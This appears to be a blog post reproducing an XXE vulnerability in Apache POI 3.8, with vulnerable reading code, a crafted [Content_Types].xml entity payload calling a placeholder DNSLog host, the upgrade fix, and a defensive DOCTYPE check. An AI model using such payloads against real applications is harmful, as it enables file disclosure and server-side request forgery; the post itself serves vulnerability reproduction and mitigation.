org.apache.poi 3.8 Excel XXE vulnerability reproduction

Reproduction steps

Add the dependencies to pom.xml:

<dependency>
    <groupId>org.apache.poi</groupId>
    <artifactId>poi</artifactId>
    <version>3.8</version>
</dependency>
<dependency>
    <groupId>org.apache.poi</groupId>
    <artifactId>poi-ooxml</artifactId>
    <version>3.8</version>
</dependency>

Key code (the workbook constructor is where POI 3.8 parses the OOXML parts, so this is the point at which an external entity in the package is resolved):

import java.io.FileInputStream;
import java.io.IOException;

import org.apache.poi.xssf.usermodel.XSSFCell;
import org.apache.poi.xssf.usermodel.XSSFRow;
import org.apache.poi.xssf.usermodel.XSSFSheet;
import org.apache.poi.xssf.usermodel.XSSFWorkbook;

public String readExcelData(String path, String sheetName) throws IOException {
    try (FileInputStream fileInputStream = new FileInputStream(path)) {
        // POI 3.8 parses every XML part of the package here, including [Content_Types].xml
        XSSFWorkbook sheets = new XSSFWorkbook(fileInputStream);
        // get the sheet
        XSSFSheet sheet = sheets.getSheet(sheetName);
        if (sheet == null) {
            throw new IllegalArgumentException("sheet not found: " + sheetName);
        }
        // get the number of rows
        int rows = sheet.getPhysicalNumberOfRows();
        StringBuilder cell = new StringBuilder();
        for (int i = 0; i < rows; i++) {
            XSSFRow row = sheet.getRow(i);
            if (row == null) {
                continue; // skip empty rows
            }
            // get the number of columns
            int columns = row.getPhysicalNumberOfCells();
            for (int j = 0; j < columns; j++) {
                XSSFCell c = row.getCell(j);
                if (c != null) {
                    cell.append(c.toString()).append("<br/>");
                }
            }
        }
        return cell.toString();
    }
}


Unzip xxe.xlsx, open [Content_Types].xml, and insert the following on the second line:

<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://dnslog/test.dtd"> ]>
<x>&xxe;</x>


Once the file is read through the code above, the DNSLog request is triggered.


Fix:

Upgrade POI to version 4.0.1 or later.
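As an added defence-in-depth example (not code from the original post): because the payload above lives in an XML part of the OOXML zip, an upload handler can reject any workbook whose XML parts carry a DOCTYPE before the file ever reaches XSSFWorkbook. This complements the upgrade rather than replacing it. It assumes Java 9 or later and takes the .xlsx path as its only argument.

```java
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.util.Enumeration;
import java.util.regex.Pattern;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;

/**
 * Pre-parse check for .xlsx uploads (added example, not part of the original post).
 * A legitimate workbook never needs a DTD, so a DOCTYPE in any XML part of the
 * package is treated as an XXE indicator and the file is rejected.
 */
public class OoxmlDoctypeCheck {
    // XML requires the keyword in uppercase; matching case-insensitively is simply stricter.
    private static final Pattern DOCTYPE = Pattern.compile("<!DOCTYPE", Pattern.CASE_INSENSITIVE);

    /** Returns the name of the first part containing a DOCTYPE, or null if the package is clean. */
    public static String findDoctypePart(String path) throws IOException {
        try (ZipFile zip = new ZipFile(path)) {
            Enumeration<? extends ZipEntry> entries = zip.entries();
            while (entries.hasMoreElements()) {
                ZipEntry entry = entries.nextElement();
                String name = entry.getName();
                // Only XML-based parts can carry a DTD: [Content_Types].xml, the .rels files and the sheet XML.
                if (!(name.endsWith(".xml") || name.endsWith(".rels"))) {
                    continue;
                }
                try (InputStream in = zip.getInputStream(entry)) {
                    String text = new String(in.readAllBytes(), StandardCharsets.UTF_8);
                    if (DOCTYPE.matcher(text).find()) {
                        return name;
                    }
                }
            }
        }
        return null;
    }

    public static void main(String[] args) throws IOException {
        String part = findDoctypePart(args[0]);
        if (part != null) {
            System.out.println("Rejected: DOCTYPE found in " + part);
        } else {
            System.out.println("No DOCTYPE found in any XML part");
        }
    }
}
```

Run against the modified xxe.xlsx from the steps above, the check reports `[Content_Types].xml` and the file can be refused before POI parses it.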

posted @ 2022-02-28 18:42 妇愁者纞萌